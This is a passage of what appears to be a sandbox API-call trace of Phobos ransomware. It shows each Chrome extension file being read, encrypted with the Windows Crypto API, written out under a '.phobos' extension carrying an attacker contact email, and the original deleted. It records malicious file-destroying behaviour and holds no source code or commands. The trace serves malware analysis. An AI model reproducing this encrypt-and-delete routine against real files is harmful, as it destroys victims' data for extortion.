lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.058] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.059] CloseHandle (hObject=0x130) returned 1 [0155.059] CloseHandle (hObject=0x134) returned 1 [0155.059] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json")) returned 1 [0155.060] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.061] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=194) returned 1 [0155.061] CloseHandle (hObject=0x134) returned 1 [0155.061] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json")) returned 0x2020 [0155.061] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.061] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.061] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.062] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.062] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.062] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc2, lpOverlapped=0x0) returned 1 [0155.063] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0155.063] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0155.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.064] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.064] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.064] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.064] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.064] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.064] CloseHandle (hObject=0x134) returned 1 [0155.064] CloseHandle (hObject=0x130) returned 1 [0155.064] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json")) returned 1 [0155.065] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.066] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2803) returned 1 [0155.066] CloseHandle (hObject=0x130) returned 1 [0155.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json")) returned 0x2020 [0155.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.066] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.066] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.069] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.069] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.069] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xaf3, lpOverlapped=0x0) returned 1 [0155.105] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb00, dwBufLen=0xb00 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb00) returned 1 [0155.106] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb00, lpOverlapped=0x0) returned 1 [0155.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.106] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.107] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0155.107] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.107] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0155.107] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.107] CloseHandle (hObject=0x130) returned 1 [0155.107] CloseHandle (hObject=0x134) returned 1 [0155.107] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json")) returned 1 [0155.108] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.109] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=207406) returned 1 [0155.109] CloseHandle (hObject=0x134) returned 1 [0155.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js")) returned 0x2020 [0155.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.109] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.109] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.110] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.110] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.110] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x32a2e, lpOverlapped=0x0) returned 1 [0155.201] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x32a30, dwBufLen=0x32a30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x32a30) returned 1 [0155.202] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x32a30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x32a30, lpOverlapped=0x0) returned 1 [0155.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0155.206] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.206] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0155.206] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0155.206] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0155.206] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.206] CloseHandle (hObject=0x134) returned 1 [0155.206] CloseHandle (hObject=0x130) returned 1 [0155.206] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js")) returned 1 [0155.208] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.209] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1741) returned 1 [0155.209] CloseHandle (hObject=0x130) returned 1 [0155.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css")) returned 0x2020 [0155.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.209] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.209] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.209] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.209] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.209] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6cd, lpOverlapped=0x0) returned 1 [0155.302] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6d0, dwBufLen=0x6d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6d0) returned 1 [0155.302] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6d0, lpOverlapped=0x0) returned 1 [0155.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0155.303] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.303] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.303] CryptDestroyKey (hKey=0xa32da8) returned 1 [0155.303] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.304] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.304] CloseHandle (hObject=0x130) returned 1 [0155.304] CloseHandle (hObject=0x134) returned 1 [0155.304] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css")) returned 1 [0155.305] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.308] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=70364) returned 1 [0155.308] CloseHandle (hObject=0x134) returned 1 [0155.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 